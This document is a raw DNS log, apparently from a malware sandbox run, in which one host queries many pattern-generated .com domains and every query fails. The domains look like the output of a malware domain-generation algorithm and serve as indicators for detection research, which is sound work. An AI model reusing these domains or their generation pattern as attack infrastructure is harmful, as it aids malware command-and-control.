Nov 11, 2024 18:13:48.709405899 CET	1.1.1.1	192.168.2.6	0x94b2	Name error (3)	qebyqeq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.728971004 CET	1.1.1.1	192.168.2.6	0xe851	Name error (3)	vopypec.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.730333090 CET	1.1.1.1	192.168.2.6	0x5e83	Name error (3)	lykyfud.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.731121063 CET	1.1.1.1	192.168.2.6	0x9824	Name error (3)	gatyzoz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.741305113 CET	1.1.1.1	192.168.2.6	0x2ff2	Name error (3)	pumywug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.753896952 CET	1.1.1.1	192.168.2.6	0xda03	Name error (3)	pujyduv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.774072886 CET	1.1.1.1	192.168.2.6	0xd29f	Name error (3)	vopyzot.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.774107933 CET	1.1.1.1	192.168.2.6	0xd244	Name error (3)	lyrylix.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.774282932 CET	1.1.1.1	192.168.2.6	0xa1dd	Name error (3)	vojyduf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.795964956 CET	1.1.1.1	192.168.2.6	0xdb98	Name error (3)	qegysyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.798640966 CET	1.1.1.1	192.168.2.6	0x101a	Name error (3)	vocymak.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.431617975 CET	1.1.1.1	192.168.2.6	0x10f7	Name error (3)	qetylip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.782398939 CET	1.1.1.1	192.168.2.6	0x53cd	Name error (3)	vonyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.785259008 CET	1.1.1.1	192.168.2.6	0xff47	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.803329945 CET	1.1.1.1	192.168.2.6	0x96b6	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.966869116 CET	1.1.1.1	192.168.2.6	0xaa5e	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.982752085 CET	1.1.1.1	192.168.2.6	0xcdd6	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.991497993 CET	1.1.1.1	192.168.2.6	0x4d55	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.991852999 CET	1.1.1.1	192.168.2.6	0xb3cf	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.996423006 CET	1.1.1.1	192.168.2.6	0x2532	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:50.019263983 CET	1.1.1.1	192.168.2.6	0xa62	Server failure (2)	lysyfyj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:51.847378016 CET	1.1.1.1	192.168.2.6	0x9d13	Name error (3)	pujypal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:51.866331100 CET	1.1.1.1	192.168.2.6	0xb9ec	Name error (3)	qebyniv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:51.886094093 CET	1.1.1.1	192.168.2.6	0x4dca	Name error (3)	gatykyh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:51.894658089 CET	1.1.1.1	192.168.2.6	0x6513	Name error (3)	puvybuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:51.899857998 CET	1.1.1.1	192.168.2.6	0x675e	Name error (3)	vojypat.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:51.986171961 CET	1.1.1.1	192.168.2.6	0x1677	Name error (3)	qetykyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.017384052 CET	1.1.1.1	192.168.2.6	0x6722	Name error (3)	puryjeq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.025146961 CET	1.1.1.1	192.168.2.6	0x8b27	Name error (3)	vocybuf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.037657022 CET	1.1.1.1	192.168.2.6	0xef48	Name error (3)	vopykum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.716948986 CET	1.1.1.1	192.168.2.6	0x84da	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.859380007 CET	1.1.1.1	192.168.2.6	0xc8fd	Name error (3)	volybut.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.865964890 CET	1.1.1.1	192.168.2.6	0x9875	Name error (3)	lysylun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.867908001 CET	1.1.1.1	192.168.2.6	0xfa9b	Name error (3)	pumyjev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.868417978 CET	1.1.1.1	192.168.2.6	0x18ea	Name error (3)	qebyhag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.869544029 CET	1.1.1.1	192.168.2.6	0x9601	Name error (3)	lykyvyx.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.870400906 CET	1.1.1.1	192.168.2.6	0x2662	Name error (3)	qedytoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.888933897 CET	1.1.1.1	192.168.2.6	0xb5fb	Name error (3)	gadyzib.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.890659094 CET	1.1.1.1	192.168.2.6	0xb263	Name error (3)	lyxyfuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.895993948 CET	1.1.1.1	192.168.2.6	0xf7ed	Name error (3)	galyvuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.896384954 CET	1.1.1.1	192.168.2.6	0x50fc	Name error (3)	lyvynid.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.898510933 CET	1.1.1.1	192.168.2.6	0xb5f	Name error (3)	qeqyqep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.899061918 CET	1.1.1.1	192.168.2.6	0x4422	Name error (3)	vofyzof.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.905836105 CET	1.1.1.1	192.168.2.6	0x4986	Name error (3)	pufyxov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.905889988 CET	1.1.1.1	192.168.2.6	0x3bf9	Name error (3)	lymyjyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.906374931 CET	1.1.1.1	192.168.2.6	0x60c5	Name error (3)	qexyfuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.911928892 CET	1.1.1.1	192.168.2.6	0x980b	Name error (3)	gadypah.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.914098978 CET	1.1.1.1	192.168.2.6	0x9dfc	Name error (3)	puzybil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.916004896 CET	1.1.1.1	192.168.2.6	0xd3d6	Name error (3)	lymymax.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.917193890 CET	1.1.1.1	192.168.2.6	0x3d2e	Name error (3)	puzyduq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.945167065 CET	1.1.1.1	192.168.2.6	0x1cb7	Name error (3)	gacyfih.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.945647001 CET	1.1.1.1	192.168.2.6	0x6c80	Name error (3)	lygyxad.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.945679903 CET	1.1.1.1	192.168.2.6	0x913a	Name error (3)	qegyxav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.946938038 CET	1.1.1.1	192.168.2.6	0xb876	Name error (3)	lyxynir.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.947467089 CET	1.1.1.1	192.168.2.6	0x83c2	Name error (3)	purywyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.951765060 CET	1.1.1.1	192.168.2.6	0xcb38	Name error (3)	vonyjef.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.952075958 CET	1.1.1.1	192.168.2.6	0x31f	Name error (3)	pupytiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.952882051 CET	1.1.1.1	192.168.2.6	0xa351	Name error (3)	qegytop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.954593897 CET	1.1.1.1	192.168.2.6	0x4908	Name error (3)	gaqyqez.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.959788084 CET	1.1.1.1	192.168.2.6	0xa0dd	Name error (3)	qekysel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.959996939 CET	1.1.1.1	192.168.2.6	0xdd26	Name error (3)	lysytoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.960274935 CET	1.1.1.1	192.168.2.6	0xfe35	Name error (3)	qeqykyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.960375071 CET	1.1.1.1	192.168.2.6	0x4ecf	Name error (3)	pumymap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.961076021 CET	1.1.1.1	192.168.2.6	0xe240	Name error (3)	qekyvup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.961184025 CET	1.1.1.1	192.168.2.6	0x2264	Name error (3)	galydyw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.961554050 CET	1.1.1.1	192.168.2.6	0xf2b6	Name error (3)	volydyk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.961879969 CET	1.1.1.1	192.168.2.6	0xa312	Name error (3)	qedylig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.961941004 CET	1.1.1.1	192.168.2.6	0x4a17	Name error (3)	vonymoc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.966559887 CET	1.1.1.1	192.168.2.6	0xa15b	Name error (3)	vowyqyt.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.966929913 CET	1.1.1.1	192.168.2.6	0xa67d	Name error (3)	pujycyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.967339039 CET	1.1.1.1	192.168.2.6	0xdae1	Name error (3)	lyvygon.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.967721939 CET	1.1.1.1	192.168.2.6	0x5072	Name error (3)	ganynos.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.968803883 CET	1.1.1.1	192.168.2.6	0xdf53	Name error (3)	vopyrik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.969651937 CET	1.1.1.1	192.168.2.6	0xf760	Name error (3)	puvygog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.969665051 CET	1.1.1.1	192.168.2.6	0x59cf	Name error (3)	qetyrul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.969907999 CET	1.1.1.1	192.168.2.6	0x4cbe	Name error (3)	vocygim.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.970628023 CET	1.1.1.1	192.168.2.6	0xabd5	Name error (3)	lyrywur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.975148916 CET	1.1.1.1	192.168.2.6	0x39b7	Name error (3)	vofypam.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.977672100 CET	1.1.1.1	192.168.2.6	0xd843	Name error (3)	vojycec.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.978194952 CET	1.1.1.1	192.168.2.6	0xe908	Name error (3)	gatyruw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.982974052 CET	1.1.1.1	192.168.2.6	0xe808	Name error (3)	ganyhab.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.991569996 CET	1.1.1.1	192.168.2.6	0xb5ce	Name error (3)	gahyces.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.994339943 CET	1.1.1.1	192.168.2.6	0x1ae	Name error (3)	lyryjej.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.997239113 CET	1.1.1.1	192.168.2.6	0x9c58	Name error (3)	pupylug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.997421026 CET	1.1.1.1	192.168.2.6	0x8b49	Name error (3)	gahypoz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.997432947 CET	1.1.1.1	192.168.2.6	0xfe61	Name error (3)	lykyser.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.107778072 CET	1.1.1.1	192.168.2.6	0x7309	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.107858896 CET	1.1.1.1	192.168.2.6	0xc8d7	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.108472109 CET	1.1.1.1	192.168.2.6	0xa106	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.300456047 CET	1.1.1.1	192.168.2.6	0x7e3f	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.311403990 CET	1.1.1.1	192.168.2.6	0xaaf6	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.625154018 CET	1.1.1.1	192.168.2.6	0x88c5	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.938108921 CET	1.1.1.1	192.168.2.6	0xef08	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.970030069 CET	1.1.1.1	192.168.2.6	0x4bd4	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.971400023 CET	1.1.1.1	192.168.2.6	0x53e1	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.985018969 CET	1.1.1.1	192.168.2.6	0xb081	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:54.051789045 CET	1.1.1.1	192.168.2.6	0xe5f1	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:54.213593006 CET	1.1.1.1	192.168.2.6	0xac4a	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:54.240782022 CET	1.1.1.1	192.168.2.6	0x1ea	Name error (3)	vonyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:54.360255957 CET	1.1.1.1	192.168.2.6	0x427b	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:54.715008974 CET	1.1.1.1	192.168.2.6	0x57b5	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:54.735668898 CET	1.1.1.1	192.168.2.6	0x7fc4	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:54.736125946 CET	1.1.1.1	192.168.2.6	0x729e	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:54.737046957 CET	1.1.1.1	192.168.2.6	0x258a	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:54.744385958 CET	1.1.1.1	192.168.2.6	0x5072	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.284812927 CET	1.1.1.1	192.168.2.6	0x4a0c	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.324140072 CET	1.1.1.1	192.168.2.6	0xf9f9	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.334692001 CET	1.1.1.1	192.168.2.6	0x8fad	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.394396067 CET	1.1.1.1	192.168.2.6	0x2a2b	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.427841902 CET	1.1.1.1	192.168.2.6	0xcba9	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.677850962 CET	1.1.1.1	192.168.2.6	0xc27e	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.692240000 CET	1.1.1.1	192.168.2.6	0x5965	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.700767994 CET	1.1.1.1	192.168.2.6	0x84f1	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.764096975 CET	1.1.1.1	192.168.2.6	0xb289	Server failure (2)	lysyfyj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.799170017 CET	1.1.1.1	192.168.2.6	0xb5ac	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.867690086 CET	1.1.1.1	192.168.2.6	0x92a	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.869798899 CET	1.1.1.1	192.168.2.6	0xf2f0	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.869810104 CET	1.1.1.1	192.168.2.6	0x6dd1	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.891257048 CET	1.1.1.1	192.168.2.6	0x58b9	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.979196072 CET	1.1.1.1	192.168.2.6	0xaf88	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:56.082597971 CET	1.1.1.1	192.168.2.6	0xdc	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:56.513763905 CET	1.1.1.1	192.168.2.6	0xa5e7	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:56.513973951 CET	1.1.1.1	192.168.2.6	0x15c0	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:56.602711916 CET	1.1.1.1	192.168.2.6	0x3555	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:56.603534937 CET	1.1.1.1	192.168.2.6	0xd749	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:56.606142998 CET	1.1.1.1	192.168.2.6	0x3bbe	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:56.610861063 CET	1.1.1.1	192.168.2.6	0x180a	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:56.624365091 CET	1.1.1.1	192.168.2.6	0x2670	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:57.421608925 CET	1.1.1.1	192.168.2.6	0xe124	Name error (3)	ganyvyw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:57.497273922 CET	1.1.1.1	192.168.2.6	0x67ab	Name error (3)	lykytin.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:57.498490095 CET	1.1.1.1	192.168.2.6	0xe53d	Name error (3)	qebyvyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:57.539623022 CET	1.1.1.1	192.168.2.6	0x5024	Name error (3)	vopyjac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:57.542666912 CET	1.1.1.1	192.168.2.6	0xad71	Name error (3)	lyvyver.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:57.665183067 CET	1.1.1.1	192.168.2.6	0xa2d1	Name error (3)	pupyjap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:57.734788895 CET	1.1.1.1	192.168.2.6	0x5f9d	Name error (3)	vojyrum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:57.816397905 CET	1.1.1.1	192.168.2.6	0xecd1	Name error (3)	pujytug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:58.003222942 CET	1.1.1.1	192.168.2.6	0xda84	Name error (3)	gatyhos.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:59.634140015 CET	1.1.1.1	192.168.2.6	0xda2b	Name error (3)	pumybuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.116528988 CET	1.1.1.1	192.168.2.6	0x6e33	Name error (3)	pujyxoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.119180918 CET	1.1.1.1	192.168.2.6	0xf8f6	Name error (3)	vojyzik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.120084047 CET	1.1.1.1	192.168.2.6	0xfdd1	Name error (3)	qetyqag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.141604900 CET	1.1.1.1	192.168.2.6	0xbf71	Name error (3)	qegylul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.145627022 CET	1.1.1.1	192.168.2.6	0xce5f	Name error (3)	puvydyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.145698071 CET	1.1.1.1	192.168.2.6	0xa81f	Name error (3)	qeqyniq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.147700071 CET	1.1.1.1	192.168.2.6	0xfe0c	Name error (3)	lyvyfux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.153410912 CET	1.1.1.1	192.168.2.6	0x9157	Name error (3)	gahyziw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.160217047 CET	1.1.1.1	192.168.2.6	0xbf3c	Name error (3)	pumygil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.161194086 CET	1.1.1.1	192.168.2.6	0x1973	Name error (3)	lymygor.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.162693977 CET	1.1.1.1	192.168.2.6	0xc1f8	Name error (3)	vocydyc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.162900925 CET	1.1.1.1	192.168.2.6	0x4e0e	Name error (3)	lyryman.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.163479090 CET	1.1.1.1	192.168.2.6	0x9d5e	Name error (3)	volycem.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.165862083 CET	1.1.1.1	192.168.2.6	0x3383	Name error (3)	vonygit.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.170581102 CET	1.1.1.1	192.168.2.6	0xbce8	Name error (3)	gatyqeb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.181922913 CET	1.1.1.1	192.168.2.6	0x3295	Name error (3)	galycah.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.184729099 CET	1.1.1.1	192.168.2.6	0xb8a5	Name error (3)	lygylur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.185650110 CET	1.1.1.1	192.168.2.6	0x7cd9	Name error (3)	vofykyt.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.186264038 CET	1.1.1.1	192.168.2.6	0x6757	Name error (3)	qebyfup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.186786890 CET	1.1.1.1	192.168.2.6	0xe035	Name error (3)	lymynuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.186817884 CET	1.1.1.1	192.168.2.6	0xfa04	Name error (3)	vowymom.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.187325001 CET	1.1.1.1	192.168.2.6	0x66d6	Name error (3)	vowyjak.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.188908100 CET	1.1.1.1	192.168.2.6	0xd49	Name error (3)	gadykyz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.189980984 CET	1.1.1.1	192.168.2.6	0xf525	Name error (3)	gacyvub.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.193392038 CET	1.1.1.1	192.168.2.6	0xefe4	Name error (3)	lygytix.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.195069075 CET	1.1.1.1	192.168.2.6	0xb2b0	Name error (3)	qekyxaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.195225000 CET	1.1.1.1	192.168.2.6	0x97b4	Name error (3)	qexyvyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.195862055 CET	1.1.1.1	192.168.2.6	0xe3a7	Name error (3)	pupywyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.196727991 CET	1.1.1.1	192.168.2.6	0xe369	Name error (3)	pufytip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.196969986 CET	1.1.1.1	192.168.2.6	0x830f	Name error (3)	gacydes.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.197247028 CET	1.1.1.1	192.168.2.6	0x5492	Name error (3)	lyxyvyn.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.198575020 CET	1.1.1.1	192.168.2.6	0x8409	Name error (3)	vofyruc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.202034950 CET	1.1.1.1	192.168.2.6	0xa6d7	Name error (3)	pufylul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.202965021 CET	1.1.1.1	192.168.2.6	0x4417	Name error (3)	ganyfuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.203485966 CET	1.1.1.1	192.168.2.6	0x60e1	Name error (3)	vopyqef.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.209821939 CET	1.1.1.1	192.168.2.6	0xc6af	Name error (3)	qetyhov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.210192919 CET	1.1.1.1	192.168.2.6	0x5a25	Name error (3)	qedykep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.210429907 CET	1.1.1.1	192.168.2.6	0xce90	Name error (3)	qedyruv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.210983992 CET	1.1.1.1	192.168.2.6	0x3db7	Name error (3)	puzypav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.210999012 CET	1.1.1.1	192.168.2.6	0x6692	Name error (3)	galypob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.211344004 CET	1.1.1.1	192.168.2.6	0xabcd	Name error (3)	lysyjex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.212433100 CET	1.1.1.1	192.168.2.6	0xe66f	Name error (3)	vonybuk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.213169098 CET	1.1.1.1	192.168.2.6	0x2373	Name error (3)	gaqyhaw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.217710018 CET	1.1.1.1	192.168.2.6	0xe9f	Name error (3)	lykyxoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.218369007 CET	1.1.1.1	192.168.2.6	0x191f	Name error (3)	purymog.com	none	none	A (IP address)	IN (0x0001)	false
